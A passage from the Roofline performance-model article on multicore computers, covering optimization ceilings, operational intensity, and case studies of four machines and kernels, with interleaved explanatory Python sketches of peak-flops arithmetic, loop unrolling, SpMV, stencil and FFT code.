For a given kernel, we can find a point on the x-axis based on its operational intensity. If we draw a vertical line (the pink dashed line in the figures) through that point, the performance of the kernel on that computer must lie somewhere along that line.

a. Please go to doi.acm.org/10.1145/1498765.1498785#supp
The horizontal and diagonal lines give this bound model its name. The Roofline sets an upper bound on performance of a kernel depending on the kernel’s operational intensity. If we think of operational intensity as a column that hits the roof, either it hits the flat part of the roof, meaning performance is compute-bound, or it hits the slanted part of the roof, meaning performance is ultimately memory-bound. In Figure 1a, a kernel with operational intensity 2.0 Flops/Byte is compute-bound and a kernel with operational intensity 1.0 Flops/Byte is memory-bound. Given a Roofline, you can use it repeatedly on different kernels, since the Roofline doesn’t vary.
Note that the ridge point (where the diagonal and horizontal roofs meet) offers insight into the computer’s overall performance. The x-coordinate of the ridge point is the minimum operational intensity required to achieve maximum performance. If the ridge point is far to the right, then only kernels with very high operational intensity can achieve the maximum performance of that computer. If it is far to the left, then almost any kernel can potentially hit maximum performance. As we explain later, the ridge point suggests the level of difficulty for programmers and compiler writers to achieve peak performance.

To illustrate, we compare the Opteron X2 with two cores in Figure 1a to its successor, the Opteron X4 with four cores. To simplify board design, they share the same socket. Hence, they have the same DRAM channels and can thus have the same peak memory bandwidth, although prefetching is better in the X4. In addition to doubling the number of cores, the X4 also has twice the peak floating-point performance per core; X4 cores can issue two floating-point SSE2 instructions per clock cycle, whereas X2 cores can issue two instructions every other clock. As the clock rate is slightly faster (2.2GHz for X2 vs. 2.3GHz for X4), the X4 is able to achieve slightly more than four times the peak floating-point performance of the X2 with the same memory bandwidth.
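The “slightly more than four times” claim follows from multiplying out the figures in the text. This requires three assumptions. Each SSE2 instruction performs two double-precision flops, since a 128-bit SSE2 register holds two doubles. Both systems are dual-socket, as stated for the X2. X2 cores average one SSE2 instruction per clock (two every other clock), while X4 cores issue two per clock.

```python
def peak_gflops(sockets, cores_per_socket, ghz, flops_per_clock_per_core):
    """Peak double-precision GFlops/sec as a simple product of machine parameters."""
    return sockets * cores_per_socket * ghz * flops_per_clock_per_core


# X2: two SSE2 instructions every other clock = 1 instruction/clock = 2 flops/clock (assumed).
x2 = peak_gflops(sockets=2, cores_per_socket=2, ghz=2.2, flops_per_clock_per_core=2)
# X4: two SSE2 instructions per clock = 4 flops/clock (assumed).
x4 = peak_gflops(sockets=2, cores_per_socket=4, ghz=2.3, flops_per_clock_per_core=4)

print(f"X2 {x2:.1f} GFlops/sec, X4 {x4:.1f} GFlops/sec, ratio {x4 / x2:.2f}")
# X2 17.6 GFlops/sec, X4 73.6 GFlops/sec, ratio 4.18
```

The X2 result matches the 17.6 GFlops/sec quoted for Figure 1a, which supports the per-clock assumptions. The extra 0.18 in the ratio comes entirely from the 2.3/2.2 clock difference.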

Figure 1b compares the Roofline 
models for these two systems. As ex- 
pected, the ridge point shifts right 
from 1.0 Flops/Byte in the Opteron X2
to 4.4 in the Opteron X4. Hence, to re- 
alize a performance gain using the X4, 
kernels need an operational intensity 
greater than 1.0 Flops/Byte. 


Adding Ceilings to the Model

The Roofline model provides an upper bound to performance. Suppose a program performs far below its Roofline. What optimizations should one implement, and in what order? Another advantage of bound-and-bottleneck analysis is that “a number of alternatives can be treated together, with a single bounding analysis providing useful information about them all.” We leverage this insight to add multiple ceilings to the Roofline model to guide which optimizations to implement. This is similar to the guidance that loop balance gives the compiler. We can think of each optimization as a “performance ceiling” below the appropriate Roofline, meaning you cannot break through a ceiling without first performing the associated optimization.

For example, to reduce computational bottlenecks on the Opteron X2, almost any kernel can be helped with two optimizations:

Improve instruction-level parallelism (ILP) and apply SIMD. For superscalar architectures, the highest performance comes when fetching, executing, and committing the maximum number of instructions per clock cycle. The goal is to improve the code from the compiler to increase ILP. The highest performance comes from completely covering the functional unit latency. One way to hide instruction latency is by unrolling loops. For x86-based architectures, another way is using floating-point SIMD instructions whenever possible, since a SIMD instruction operates on pairs of adjacent operands; and

Balance floating-point operation mix. 


The best performance requires that | 


a significant fraction of the instruc- 
tion mix be floating-point operations 
(discussed later). Peak floating-point 
performance typically also requires 
an equal number of simultaneous 
floating-point additions and multipli- 
cations, since many computers have 
multiply-add instructions or an equal 
number of adders and multipliers. 
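Both computational optimizations show up in the shape of a simple loop. The sketch below is a hypothetical dot-product helper written in Python only to show that shape; the interpreter will not exhibit the ILP gain, which appears when the same structure is written in a compiled language. Four independent partial sums replace the single dependency chain on one accumulator, so a superscalar core can overlap their additions, and each step pairs one multiply with one add, a naturally balanced mix.

```python
def dot_unrolled4(x, y):
    """Dot product with four independent partial sums (hypothetical helper).

    Each accumulator is its own dependency chain, so in compiled code a
    superscalar core can overlap the four additions instead of waiting on a
    single running total. Every step pairs one multiply with one add.
    """
    if len(x) != len(y):
        raise ValueError("vectors must have the same length")
    n = len(x)
    s0 = s1 = s2 = s3 = 0.0
    i = 0
    while i + 4 <= n:  # main unrolled body
        s0 += x[i] * y[i]
        s1 += x[i + 1] * y[i + 1]
        s2 += x[i + 2] * y[i + 2]
        s3 += x[i + 3] * y[i + 3]
        i += 4
    for j in range(i, n):  # leftover elements when n is not a multiple of 4
        s0 += x[j] * y[j]
    return (s0 + s1) + (s2 + s3)


print(dot_unrolled4([1.0, 2.0, 3.0, 4.0, 5.0], [1.0] * 5))  # 15.0
```

Reassociating the sum this way can change floating-point rounding slightly, which is one reason compilers typically do not apply it to floating-point code without explicit permission.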
Figure 2: Roofline model with ceilings for Opteron X2.

Memory bottlenecks can be reduced with the help of three optimizations:

3. Restructure loops for unit-stride accesses. Optimizing for unit-stride memory accesses engages hardware prefetching, significantly increasing memory bandwidth;

4. Ensure memory affinity. Most microprocessors today include a memory controller on the same chip with the processors. If the system has two multicore chips, then some addresses go to the DRAM local to one multicore chip, and the rest go over a chip interconnect to access the DRAM local to another chip. The latter lowers performance. This optimization allocates data and the threads tasked to that data to the same memory-processor pair, so the processors rarely have to access the memory attached to other chips; and

5. Use software prefetching. The highest performance usually requires keeping many memory operations in flight, which is easier to do via prefetching than by waiting until the data is actually requested by the program. On some computers, software prefetching delivers more bandwidth than hardware prefetching alone.

Like the computational Roofline, computational ceilings can come from an optimization manual, though it’s easy to imagine collecting the necessary parameters from simple microbenchmarks. The memory ceilings require running experiments on each computer to determine the gap between them (see online Appendix A.1). The good news is that, like the Roofline, the ceilings need to be measured only once per multicore computer.

Figure 2 adds ceilings to the Roofline model in Figure 1a; Figure 2a shows the computational ceilings and Figure 2b the memory bandwidth ceilings. Although the higher ceilings are not labeled with lower optimizations, these lower optimizations are implied; to break through a ceiling, the programmer must have already broken through all the ones below. Figure 2a shows the computational “ceilings” of 8.8 GFlops/sec if the floating-point operation mix is imbalanced and 2.2 GFlops/sec if the optimizations to increase ILP or SIMD are also missing. Figure 2b shows the memory bandwidth ceilings of 11 GB/sec without software prefetching, 4.8 GB/sec without memory affinity optimizations, and 2.7 GB/sec with only unit stride optimizations.

Figure 2c combines Figures 2a and 2b into a single graph. The operational intensity of a kernel determines the optimization region, and thus which optimizations to try. The middle of Figure 2c shows that computational optimizations and memory bandwidth optimizations overlap; we picked the colors to highlight this overlap. For example, Kernel 2 falls in the blue trapezoid on the right, suggesting the programmer should work only on the computational optimizations. If a kernel fell in the yellow triangle on the lower left, the model would suggest trying just memory optimizations. Kernel 1 falls in the green (= yellow + blue) parallelogram in the middle, suggesting the programmer try both types of optimization. Note that the Kernel 1 vertical line falls below the floating-point imbalance optimization, so optimization 2 may be skipped.

The ceilings of the Roofline model suggest which optimizations the programmer should perform. The height of the gap between a ceiling and the next higher ceiling is the potential reward for trying this optimization. Thus, Figure 2 suggests that optimization 1, which improves ILP/SIMD, has a large potential benefit for optimizing computation on that computer, and optimization 4, which improves memory affinity, has a large potential benefit for improving memory bandwidth on that computer.

contributed articles

Table 1: Characteristics of the four multicore computers.

Computer | Intel Xeon | AMD Opteron X4 | Sun UltraSPARC T2+ | IBM Cell
MPU type | Clovertown (e5345) | Barcelona (2356) | Niagara 2 (5120) | QS20
ISA | x86/64 | x86/64 | SPARC | Cell SPEs
Total threads | 8 | 8 | 128 | 16
Total cores | 8 | 8 | 16 | 16
Total sockets | 2 | 2 | 2 | 2
GHz | 2.33 | 2.30 | 1.17 | 3.20
Peak GFlops/sec | 75 | 74 | 19 | 29
Peak DRAM GB/sec | 21.3 read, 10.6 write | 2 x 10.6 | 2 x 21.3 read, 2 x 10.6 write | 2 x 25.6
Stream GB/sec | 5.9 | 16.6 | 26.0 | 47.0
DRAM type | FBDIMM | DDR2 | FBDIMM | XDR

The order of the ceilings suggests 
the optimization order, so we rank 
the ceilings from bottom to top; those 
most likely to be realized by a compiler 
or with little effort by a programmer 
are at the bottom and those that are 
difficult for a programmer to imple- 
ment or inherently lacking in a kernel 
are at the top. The one quirky ceiling is 
floating-point balance, since the actu- 
al mix depends on the kernel. For most 
kernels, achieving parity between mul- 
tiplies and additions is difficult, but 
for a few kernels, parity is natural. One 
example is sparse matrix-vector mul- 
tiplication; for this domain, we would 
place floating-point mix as the lowest 
ceiling, since it is inherent. Like the 
3Cs model, as long as the Roofline 
model delivers on insight, it need not 
be perfect. 
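The ceiling logic can be sketched the same way. In this minimal Python sketch, applying the computational optimizations in bottom-to-top order moves the compute cap up one ceiling at a time, and the gap to the next ceiling is the most the next optimization can return. The two lower values are the Figure 2a ceilings quoted in this section; the top value, the 4.8 GB/sec bandwidth in the usage example, and all names are hypothetical.

```python
# Computational ceilings for the Opteron X2 example, ordered bottom to top,
# in GFlops/sec. 2.2 and 8.8 are the Figure 2a values quoted in the text;
# the top (roof) value is a placeholder assumption.
COMPUTE_CEILINGS = [
    ("no ILP/SIMD, imbalanced FP mix", 2.2),
    ("ILP/SIMD done, imbalanced FP mix", 8.8),
    ("ILP/SIMD and FP balance done (assumed roof)", 16.0),
]


def compute_cap(optimizations_done: int) -> float:
    """Ceiling a kernel sits under after applying the first N optimizations in order."""
    return COMPUTE_CEILINGS[optimizations_done][1]


def potential_reward(optimizations_done: int) -> float:
    """Gap to the next ceiling up: the most the next optimization could gain."""
    if optimizations_done + 1 >= len(COMPUTE_CEILINGS):
        return 0.0
    return compute_cap(optimizations_done + 1) - compute_cap(optimizations_done)


def bound(optimizations_done: int, bandwidth_gbs: float, intensity: float) -> float:
    """Roofline bound using the current compute ceiling instead of the peak."""
    return min(compute_cap(optimizations_done), bandwidth_gbs * intensity)


for done in range(len(COMPUTE_CEILINGS)):
    print(done, compute_cap(done), round(potential_reward(done), 2), bound(done, 4.8, 0.5))
```

For a kernel at 0.5 Flops/Byte with an assumed 4.8 GB/sec, the first optimization lifts the bound from 2.2 only to 2.4 GFlops/sec, because the memory roof (4.8 x 0.5) takes over; further compute work pays off only after memory optimizations raise that roof.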


Tying the 3Cs to Operational Intensity
Operational intensity tells programmers which ceilings need the most attention. Thus far, we have assumed that the operational intensity is fixed, though this is not always the case; for example, for some kernels, the operational intensity increases with problem size (such as for Dense Matrix and FFT problems).

Caches filter the number of accesses that go to memory, so optimizations that improve cache performance increase operational intensity. Thus, we may couple the 3Cs model to the Roofline model. Compulsory misses set the minimum memory traffic and hence the highest possible operational intensity. Memory traffic from conflict and capacity misses can considerably lower the operational intensity of a kernel, so we should try to eliminate such misses.

For example, we can reduce traffic from conflict misses by padding arrays to change cache line addressing. A second example is that some computers have a non-allocating store instruction, so stores go directly to memory and do not affect caches. This approach prevents loading a cache block with data that is about to be overwritten, thereby reducing memory traffic. It also prevents displacing useful items in the cache with data that will not be read, thereby avoiding conflict misses.
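Why padding helps can be seen from how addresses map to cache sets. The Python sketch below uses an assumed, simplified cache (32 KiB, 8-way, 64-byte lines, so 64 sets and a 4096-byte way) and hypothetical array base addresses. Arrays whose starting addresses differ by a multiple of the way size put corresponding elements into the same set; conflict misses follow once more such streams share a set than the cache has ways. One line of padding after each array staggers them.

```python
LINE_BYTES = 64                    # assumed cache line size
NUM_SETS = 64                      # assumed: 32 KiB / (64 B lines * 8 ways)
WAY_BYTES = LINE_BYTES * NUM_SETS  # 4096: addresses this far apart share a set


def cache_set(address: int) -> int:
    """Set index from the address bits just above the line offset (simplified model)."""
    return (address // LINE_BYTES) % NUM_SETS


def sets_touched(bases, element_bytes, index):
    """Set index hit by element `index` of each array starting at the given bases."""
    return [cache_set(base + index * element_bytes) for base in bases]


# Three hypothetical double arrays laid out back to back, each 4096 bytes long.
unpadded = [0, 4096, 8192]
# The same arrays with one cache line of padding inserted after each one.
padded = [0, 4096 + 64, 8192 + 128]

print(sets_touched(unpadded, 8, 10))  # [1, 1, 1]: all three share a set
print(sets_touched(padded, 8, 10))    # [1, 2, 3]: padding spreads them out
```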

This shift of operational intensity to 
the right could put a kernel in a differ- 
ent optimization region. Generally, we 
advise improving operational inten- 
sity of the kernel before implementing 
other optimizations. 


Demonstrating the Model 
To demonstrate the Roofline model’s utility, we now construct Roofline models for four recent multicore computers and then optimize four floating-point kernels. We’ll then show that the ceilings and rooflines bound the observed performance for all computers and kernels.

Four diverse multicore computers. 
Given the lack of conventional wisdom 
concerning multicore architecture, it’s 
not surprising that there are as many 
different designs as there are chips. 
Table 1 lists the key characteristics of 
the four multicore computers, all dual- 
socket systems, that we discuss here. 


The Intel Xeon uses relatively sophisticated processors, capable of executing two SIMD instructions per clock cycle that can each perform two double-precision floating-point operations. It is the only one of the four machines with a front-side bus connecting to a common north bridge chip and memory controller. The other three have the memory controller on chip.

The Opteron X4 also uses sophisticated cores with high peak floating-point performance but is the only computer of the four with on-chip L3 caches. The two sockets communicate over separate, dedicated HyperTransport links, making it possible to build a “glueless” multi-chip system.

The Sun UltraSPARC T2+ uses relatively simple processors at a modest clock rate compared to the other three, allowing it to have twice as many cores per chip. It is also highly multithreaded, with eight hardware-supported threads per core. It has the highest memory bandwidth of the four, as each chip has two dual-channel memory controllers that can drive four sets of DDR2/FBDIMMs.

The clock rate of the IBM Cell QS20 is the highest of the four multicores at 3.2GHz. It is also the most unusual of the four, with a heterogeneous design, a relatively simple PowerPC core, and eight synergistic processing elements (SPEs) with their own unique SIMD-style instruction set. Each SPE also has its own local memory, instead of a cache. An SPE must transfer data from main memory into the local memory to operate on it and then back to main memory when the computation is completed. It uses Direct Memory Access (DMA), which has some similarity to software prefetching. The lack of caches means porting programs to Cell is more challenging.
Four diverse floating-point kernels. Rather than pick programs from a standard parallel benchmark suite (such as Parsec and Splash-2), we were inspired by the work of Phil Colella, an expert in scientific computing at Lawrence Berkeley National Laboratory, who identified seven numerical methods he believes will be important for computational science and engineering for at least the next decade. Because he identified seven, they are called the Seven Dwarfs and are specified at a high level of abstraction to allow reasoning about their behavior across a broad range of implementations. The widely read “Berkeley View” report found that if the data types were changed from floating point to integer, the same Seven Dwarfs would also be found in many other programs. Note that the claim is not that the Dwarfs are easy to parallelize but that they will be important to computing in most current and future applications; designers are thus advised to make sure they run well on the systems they create, whether or not those systems are parallel.

Table 2: Characteristics of four floating-point kernels.

Name | Operational Intensity (Flops/Byte) | Description
SpMV | 0.17 to 0.25 | Sparse Matrix-Vector multiply: y = A*x where A is a sparse matrix and x, y are dense vectors; multiplies and adds equal.
LBMHD | 0.70 to 1.07 | Lattice-Boltzmann Magnetohydrodynamics is a structured grid code with a series of time steps.
Stencil | 0.33 to 0.50 | A multigrid kernel that updates seven nearby points in a 3D stencil for a 256³ problem.
3D FFT | 1.09 to 1.64 | 3D Fast Fourier Transform (2 sizes: 128³ and 512³).

Figure 3a-3c: Roofline model for Intel Xeon, AMD Opteron X4, and IBM Cell.

One advantage of using these higher-level descriptions of programs is that, to evaluate future systems, we are not tied to code that might have been originally written to optimize an old computer. Another advantage of the restricted number is that efficiency-level programmers can create autotuners for each kernel that would search the alternatives to produce the best code for that multicore computer, including extensive cache optimizations. Table 2 lists the four kernels from among the Seven Dwarfs we use to demonstrate the Roofline model on the four multicore computers listed in Table 1; the autotuners discussed in this section are from three sources.

For these kernels, there is sufficient parallelism to utilize all the cores and threads and keep them load balanced; see online Appendix A.2 for how to handle cases when load is not balanced.

Roofline models and results. Figure 3 shows the Roofline models for Xeon, X4, and Cell. The pink vertical dashed lines indicate the operational intensity and the red X marks performance achieved for that particular kernel. Multiply-add balance comes naturally to SpMV, whose multiplies and adds are equal in number. However, achieving balance is difficult for the others. Hence, each computer in Figure 3 has two graphs: the left one has multiply-add balance as the top ceiling and is used for Lattice-Boltzmann Magnetohydrodynamics (LBMHD), Stencil, and 3D FFT; the right one has multiply-add as the bottom ceiling and is used for SpMV. Since the T2+ neither has a fused multiply-add instruction nor can simultaneously issue multiplies and adds, Figure 4 shows a single roofline for the four kernels on the T2+ without the multiply-add balance ceiling.

The Intel Xeon has the highest peak double-precision performance of the four multicores. However, the Roofline model in Figure 3a shows this level of performance can be achieved only with operational intensities of at least 6.7 Flops/Byte; in other words, Clovertown requires 55 floating-point operations for every double-precision operand (8B) going to DRAM to achieve peak performance. This high ratio is due in part to the limitation of the front-side bus, which also carries the coherency traffic that can consume up to half the bus bandwidth. Intel includes a snoop filter to prevent unnecessary coherency traffic on the bus. If the working set is small enough for the hardware to filter, the snoop filter nearly doubles the delivered memory bandwidth.

The Opteron X4 has a memory controller on chip, its own path to 667MHz DDR2 DRAM, and separate paths for coherency. Figure 3 shows that the ridge point in its Roofline model is to the left of the Xeon’s, at an operational intensity of 4.4 Flops/Byte. The Sun T2+ has the highest memory bandwidth, so its ridge point is at an exceptionally low operational intensity of just 0.33 Flops/Byte. It keeps multiple memory transfers in flight by using many threads. The IBM Cell ridge point is at an operational intensity of 0.65 Flops/Byte.
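Comparing each kernel’s operational intensity with these ridge points shows which roof its vertical line meets. The minimal Python sketch below uses the ridge points quoted above and the upper end of each range in Table 2 (on the T2+, LBMHD stays at 0.70 Flops/Byte, still to the right of that machine’s 0.33 ridge). The dictionaries and the function name are illustrative. Which roof a kernel meets does not settle what it achieves, since the ceilings beneath the roofs can bind first.

```python
# Ridge points (Flops/Byte) as quoted in the text.
RIDGE = {"Intel Xeon": 6.7, "AMD Opteron X4": 4.4, "Sun T2+": 0.33, "IBM Cell": 0.65}

# Upper end of each kernel's operational-intensity range from Table 2.
KERNEL_OI = {"SpMV": 0.25, "LBMHD": 1.07, "Stencil": 0.50, "3D FFT": 1.64}


def regime(intensity: float, ridge: float) -> str:
    """Left of the ridge point the diagonal (bandwidth) roof is the binding one."""
    return "memory-bound" if intensity < ridge else "compute-bound"


for kernel, oi in KERNEL_OI.items():
    row = {machine: regime(oi, ridge) for machine, ridge in RIDGE.items()}
    print(kernel, row)
```

SpMV lands left of every ridge point, matching the observation that most SpMV optimizations involve the memory system.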
Figure 3d-3f: Roofline model for Intel Xeon, AMD Opteron X4, and IBM Cell.

Here, we demonstrate the Roofline model on four diverse multicore architectures running four kernels representative of some of the Seven Dwarfs:

Sparse matrix-vector multiplication. The first example kernel, from the sparse matrix computational dwarf, is Sparse Matrix-Vector multiply (SpMV); the computation is y = A*x, where A is a sparse matrix and x and y are dense vectors. SpMV is popular in scientific computing, economic modeling, and information retrieval. Alas, conventional implementations often run at less than 10% of peak floating-point performance in uniprocessors. One reason is the irregular accesses to memory, which might be expected from sparse matrices. The operational intensity varies from 0.17 Flops/Byte before a register blocking optimization to 0.25 Flops/Byte afterward (see online Appendix A.1).

Given that the operational intensity 
of SpMV was below the ridge point of 
all four multicores in Figure 3, most 
optimizations involve the memory sys- 
tem. Table 3 summarizes the optimi- 
zations used by SpMV and the rest of 
the kernels. Many are associated with 
the ceilings in Figure 3, and the height 
of the ceilings suggests the potential 
benefit of these optimizations. 
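The 0.17 to 0.25 range quoted for SpMV can be approximated with back-of-the-envelope arithmetic. This Python sketch stores the matrix in compressed sparse row (CSR) form and assumes double-precision values and 32-bit column indices. It counts only matrix value and index bytes, ignoring vector and row-pointer traffic and any explicit zeros that blocking adds. Under those assumptions each nonzero costs 12 bytes for two flops (about 0.17 Flops/Byte), and as register blocking shares one index across more nonzeros the figure approaches 2/8 = 0.25. That this matches the quoted range is suggestive, but it is not necessarily how the authors derived it; the helper names are hypothetical.

```python
def spmv_csr(values, col_idx, row_ptr, x):
    """y = A*x for A stored in compressed sparse row (CSR) form."""
    y = [0.0] * (len(row_ptr) - 1)
    for row in range(len(y)):
        acc = 0.0
        for k in range(row_ptr[row], row_ptr[row + 1]):
            acc += values[k] * x[col_idx[k]]  # one multiply + one add per nonzero
        y[row] = acc
    return y


def spmv_intensity(value_bytes=8, index_bytes=4, nonzeros_per_index=1):
    """Flops/Byte counting only matrix value and index traffic (an assumption).

    nonzeros_per_index > 1 models register blocking, where one column index
    is shared by a small dense block of nonzeros.
    """
    flops = 2.0
    bytes_per_nonzero = value_bytes + index_bytes / nonzeros_per_index
    return flops / bytes_per_nonzero


# A = [[1, 0, 2], [0, 3, 0], [4, 0, 5]] in CSR form.
values = [1.0, 2.0, 3.0, 4.0, 5.0]
col_idx = [0, 2, 1, 0, 2]
row_ptr = [0, 2, 3, 5]
print(spmv_csr(values, col_idx, row_ptr, [1.0, 1.0, 1.0]))  # [3.0, 3.0, 9.0]
print(round(spmv_intensity(), 2))                           # 0.17
print(round(spmv_intensity(nonzeros_per_index=4), 3))       # 0.222
```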


Lattice-Boltzmann Magnetohydrodynamics. Like SpMV, LBMHD tends to achieve a small fraction of peak performance on uniprocessors due to the complexity of the data structures and the irregularity of memory access patterns. The Flop-to-Byte ratio is 0.70 vs. 0.25 or less in SpMV. By using the no-allocate store optimization, a programmer can improve the operational intensity of LBMHD to 1.07 Flops/Byte. Both x86 multicores offer this cache optimization, but Cell does not have this problem since it uses DMA. Hence, T2+ is the only one of the four computers with the lower intensity of 0.70 Flops/Byte.

Figures 3 and 4 show that the operational intensity of LBMHD is high enough that both computational and memory bandwidth optimizations make sense on all multicores, except the T2+, where the Roofline ridge point is below the operational intensity of LBMHD. The T2+ reaches its performance ceiling using only the computational optimizations.

Figure 4: Roofline model for Sun UltraSPARC T2+.
Figure 5: Roofline for transpose phase of 3D FFT for the Cell.

Stencil. In general, a stencil on a structured grid is defined as a function that updates a point based on the values of its neighbors. The stencil structure remains constant as it moves from one point in space to the next. For this work, we use the stencil derived from the explicit heat equation, a partial differential equation on a uniform 256³ 3D grid. The stencil’s neighbors are the six nearest points (two along each axis), as well as the center point itself. This stencil performs eight floating-point operations for every 24B of compulsory memory traffic on write-allocate architectures, yielding an operational intensity of 0.33 Flops/Byte.
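The eight-flop count and the 0.33 Flops/Byte figure can be checked with a small sketch. The Python code below applies a 7-point update of the form alpha*center + beta*(sum of six neighbors), an assumed but common way to write an explicit heat-equation step. It computes the intensity assuming the 24B per point breaks down as one 8B read of the source grid, one 8B write-allocate fill of the destination line, and one 8B write-back. Dropping the fill, as a non-allocating store would, gives 0.50, the upper end of the Stencil range in Table 2. The function names are hypothetical.

```python
def stencil_sweep(u, alpha, beta):
    """One out-of-place 7-point sweep over the interior of a 3D grid (nested lists)."""
    n0, n1, n2 = len(u), len(u[0]), len(u[0][0])
    out = [[row[:] for row in plane] for plane in u]  # copy keeps boundary values
    for i in range(1, n0 - 1):
        for j in range(1, n1 - 1):
            for k in range(1, n2 - 1):  # innermost index: unit stride in a C layout
                neighbors = (u[i - 1][j][k] + u[i + 1][j][k]
                             + u[i][j - 1][k] + u[i][j + 1][k]
                             + u[i][j][k - 1] + u[i][j][k + 1])  # 5 adds
                out[i][j][k] = alpha * u[i][j][k] + beta * neighbors  # 2 multiplies + 1 add
    return out


FLOPS_PER_POINT = 8  # 5 + 2 + 1 from the update above


def stencil_intensity(write_allocate: bool = True) -> float:
    """Flops/Byte for compulsory traffic only (assumed 8B per access)."""
    read_source = 8
    write_back = 8
    allocate_fill = 8 if write_allocate else 0  # destination line read before being overwritten
    return FLOPS_PER_POINT / (read_source + write_back + allocate_fill)


print(round(stencil_intensity(True), 2), stencil_intensity(False))  # 0.33 0.5
```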

3D FFT. This fast Fourier transform 
is the classic divide-and-conquer algo- 
rithm that recursively breaks down a 
discrete Fourier transform into many 
smaller ones. The FFT is ubiquitous 
in many domains, including image 
processing and data compression. An 
efficient approach for 3D FFT is to per- 
form 1D transforms along each dimen- 
sion to maintain unit-stride accesses. 
We computed the 1D FFTs on Xeon, X4, and T2+ using an autotuned library (FFTW). For Cell, we implemented a radix-2 FFT.
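Both ideas in this passage, a radix-2 FFT and a 3D transform built from 1D transforms along each dimension, can be sketched compactly. The Python below is a generic textbook recursive radix-2 FFT, not the authors’ Cell implementation or FFTW. The helper names are hypothetical, and input lengths must be powers of two. The second and third passes gather strided data into a contiguous list before transforming it, which is where a real implementation’s transpose or unit-stride restructuring would go.

```python
import cmath


def fft(x):
    """Recursive radix-2 decimation-in-time FFT; len(x) must be a power of two."""
    n = len(x)
    if n == 0 or n & (n - 1):
        raise ValueError("length must be a power of two")
    if n == 1:
        return [complex(x[0])]
    even = fft(x[0::2])
    odd = fft(x[1::2])
    out = [0j] * n
    for k in range(n // 2):
        twiddle = cmath.exp(-2j * cmath.pi * k / n) * odd[k]
        out[k] = even[k] + twiddle
        out[k + n // 2] = even[k] - twiddle
    return out


def fft3d(a):
    """3D FFT of a nested list a[i][j][k] via 1D FFTs along each axis."""
    n0, n1, n2 = len(a), len(a[0]), len(a[0][0])
    # Pass 1: last axis, already contiguous in each row.
    b = [[fft(a[i][j]) for j in range(n1)] for i in range(n0)]
    # Pass 2: middle axis; gather each strided pencil, transform, scatter back.
    for i in range(n0):
        for k in range(n2):
            pencil = fft([b[i][j][k] for j in range(n1)])
            for j in range(n1):
                b[i][j][k] = pencil[j]
    # Pass 3: first axis, same gather/transform/scatter pattern.
    for j in range(n1):
        for k in range(n2):
            pencil = fft([b[i][j][k] for i in range(n0)])
            for i in range(n0):
                b[i][j][k] = pencil[i]
    return b
```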

FFT differs from SpMV, LBMHD, and Stencil in that its operational intensity is a function of problem size. For the 128³- and 512³-point transforms we examine, the operational intensities are 1.09 and 1.41 Flops/Byte, respectively; Cell’s 1GB main memory is too small to hold 512³ points, so we estimate this result. On Xeon and X4, an entire 128x128 plane fits in cache, increasing temporal locality and improving the intensity to 1.64 for the 128³-point transform.


Productivity vs. performance. In addition to performance, productivity (or the programming difficulty of achieving good performance) is another important issue for the parallel computing revolution. One question is whether a low ridge point gives insight into productivity.


The Sun T2+ (with the lowest ridge point of the four computers) was the easiest to program due to its large memory bandwidth and easy-to-understand cores. The advice for these kernels on T2+ is simply to try to get good-performing code from the compiler, then use as many threads as possible. The downside is that the L2 cache is only 16-way set associative, which can lead to conflict misses when 64 threads access the cache, as it did for the Stencil kernel.

In contrast, the computer with the highest ridge point had the lowest unoptimized performance. The Intel Xeon was difficult to program because it was hard to understand the memory behavior of the dual front-side buses and how hardware prefetching worked, and hard to get good SIMD code from the compiler. The C code for both it and the Opteron X4 is liberally sprinkled with intrinsic statements involving SIMD instructions to get good performance.

With a ridge point close to the Xeon’s, the Opteron X4 required about as much effort, since it benefited from the most types of optimization. However, its memory behavior was easier to understand than that of the Xeon.

The IBM Cell (with a ridge point almost as low as the Sun T2+’s) involved two types of challenges. First, it was difficult for the compiler to exploit the SIMD instructions of Cell’s SPEs, so at times we needed to help the compiler by inserting intrinsic statements with assembly language instructions into the C code. This comment reflects the immaturity of the IBM compiler, as well as the difficulty of compiling for these SIMD instructions. Second, the memory system is more challenging. Since each SPE has local memory in a separate address space, we could not simply port the code and start running on the SPE. We needed to change the program to issue DMA commands to transfer data back and forth between local store and memory. The good news is that DMA played the role of software prefetch in caches. With a local store, it is easier to program DMA, achieve good memory performance, and overlap memory transfers with computation than it is to schedule prefetches for caches.

To demonstrate the utility of the Roofline model, Table 4 lists the upper and lower bounding ceilings and the GFlops/sec and GB/sec per kernel-computer pair; recall that operational intensity is the ratio between the two rates. The ceilings listed are the ceilings sandwiching actual performance. All 16 combinations of kernel and computer validate this bound-and-bottleneck model since Roofline’s upper and lower ceilings bound performance and the kernels were optimized, as the lower ceilings suggest. The metric that
limits performance is in bold; 15 of 16 ceilings are memory-bound for Xeon and X4, while the bottleneck is almost evenly split for T2+ and Cell. For FFT, the surrounding ceilings are memory-bound for Xeon and X4, but compute-bound for T2+ and Cell.

NO. 4 COMMUNICATIONS OF THE ACM 73

Table 3: Kernel optimizations.

Memory affinity. Reduce accesses to DRAM memory attached to the other socket.
Long unit-stride accesses. Change loop structures to generate long unit-stride accesses to engage the prefetchers; also reduces TLB misses.
Software prefetching. Software and hardware prefetching both used to get the most from memory systems.
Reduce conflict misses. Pad arrays to improve cache-hit rates.
Unroll and reorder loops. To expose sufficient parallelism and improve cache utilization, unroll and reorder loops to group statements with similar addresses; improves code quality, reduces register pressure, facilitates SIMD.
“SIMD-ize” code. The x86 compilers didn't generate good SSE code, so we made a code generator to produce SSE intrinsics.
Compress data structures (SpMV only). Since bandwidth limits performance, we used smaller data structures: 16b vs. 32b index and smaller representations of non-zero subblocks.
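Because operational intensity is the ratio of the two achieved rates, each row of Table 4 can be sanity-checked by dividing one column by the other. The minimal Python sketch below does this for a handful of those rows; the names are illustrative. Small differences from the printed O.I. are expected because the published rates are rounded.

```python
# (GFlops/sec achieved, GB/sec achieved, O.I. as printed) for a few Table 4 rows.
ACHIEVED = {
    ("Intel Xeon", "SpMV"): (2.8, 11.1, 0.25),
    ("Intel Xeon", "LBMHD"): (5.6, 5.3, 1.07),
    ("AMD Opteron X4", "Stencil"): (8.0, 16.0, 0.50),
    ("Sun T2+", "LBMHD"): (10.5, 15.0, 0.70),
}


def achieved_intensity(gflops: float, gbs: float) -> float:
    """Operational intensity implied by two measured rates, in Flops/Byte."""
    return gflops / gbs


for (machine, kernel), (gflops, gbs, printed) in ACHIEVED.items():
    print(machine, kernel, round(achieved_intensity(gflops, gbs), 2), printed)
```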


Fallacies About Roofline 

We have presented this material in several venues, prompting a number of misconceptions we address here:

